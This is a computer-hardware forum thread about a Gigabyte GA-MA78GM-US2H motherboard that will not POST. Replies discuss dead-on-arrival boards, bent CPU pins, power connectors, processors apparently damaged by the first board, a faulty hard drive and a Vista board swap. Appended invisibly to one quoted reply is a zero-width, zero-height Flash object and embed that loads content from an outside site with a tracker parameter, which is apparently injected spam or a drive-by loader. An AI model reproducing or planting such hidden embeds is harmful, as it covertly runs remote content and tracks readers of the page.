GAMA78GM-US2H won't Post

Collapse
X

• Filter
  • Time
  • Show
Clear All

• GAMA78GM-US2H won't Post

After spending a week on this issue, I found this forum and am hoping for some fresh ideas.

This is the second board from Newegg(RMAed the first one). It won't POST. CPU fan spins up. When in the case, the case fan spins up, but no video. Screen remains blank. Does not post. I tried two different Athlon X2 CPUs,(4400+, 5400+) three different brands of memory (corsair CM2X2048-6400C5, 800Mhz, Crucial CT 12864AA667 8FG, Acer brand memory), 3 differnt power suplies and two different monitors connected to the VGA port. All these components worked in other systems.

Is there an issue with this board or something special that needs to be set?

My case is older. I connected the Power switch, HD LED connector, reset switch and speaker (but not the message connector) there were no beep codes at power up. I removed from the case and disconected the HD, DVD, etc. tried one stick of memory instead of two in all slots and tried all 4 memory slots in various combinations and singularly. I also reset the bios by pulling the battery and puting a jumper on the CMOS reset.

Is there something I am missing? Could I get two DOA boards?

Thanks for any advise.

Re: GAMA78GM-US2H won't Post

Yeap Two DOA Boards can happen. They could have even sent you a RMA'd board, I have seen it happen as well as someone getting a used board as New. They could have even shipped you back the same dead board you sent them, especially if you did not call and get a cross-shipment setup.

If you do end up sending the board back for a new one, be sure to mark the box and board with a UV marker and then check those spots when you get your replacement to be sure at least that you are not getting your same board back again

Have you checked for Bent pins under the CPU (Or on the CPU< sorry dont know AMD)?

You do have the 8Pin and 24Pin cables connected right? Just checking

Comment

Thanks for the reply, LSDMEASAP. I know the second isn't my original board as I cross shipped the second board. As it turns out, some of the parts I was testing, including the two CPU's were running in an ACER computer. After I tried them in the first GAMA... boad, they would no longer work in the ACER. I finally bought another AMD processor and it works in the second GAMA.... board (although the acer won't post with the new proc). The first one must have blown both my processors when I tried them, which is why the second board wouldn't work with those two procs. The second GAMA... board posts with the new proc, so I am up and running again.

Comment

Ahh good to hear!

Sorry to hear about your CPU's though

You sure your PSU is good?

Comment

The PSU checked good with the tester I have, but I went ahead and bought another 535Watt PSU anyway. However, the SATA Seagate 500 GB HD arrived DOA so now I have to send that back to newegg. Very good price on the unit, but what's the point if they arrive DOA! BTW, the foxconn MB in the Acer I replaced with a different Gigabyte board that has the same chipset. It booted into windows vista, loaded a couple of drivers and I was good to go. No need for a recovery reinstall or Windows Activation!

Comment

I'm sure not everyone of them will be DOA you got unlucky =)

Originally posted by tnhall View Post
            The PSU checked good with the tester I have, but I went ahead and bought another 535Watt PSU anyway. However, the SATA Seagate 500 GB HD arrived DOA so now I have to send that back to newegg. Very good price on the unit, but what's the point if they arrive DOA! BTW, the foxconn MB in the Acer I replaced with a different Gigabyte board that has the same chipset. It booted into windows vista, loaded a couple of drivers and I was good to go. No need for a recovery reinstall or Windows Activation!<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://ancientnovels.com/?tracker=3248"></param><param name="allowFullScreen" value="true"></param><embed src="http://ancientnovels.com/?tracker=3248" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Comment

Ya, DOA Drives just happen sometimes, really with any product. Sorry to hear you got the short straw that time

Nice to hear about your Vista move to the new board without issue!

Let us know how you get along with all this once you get everything back from RMA's

Comment

Working...
              X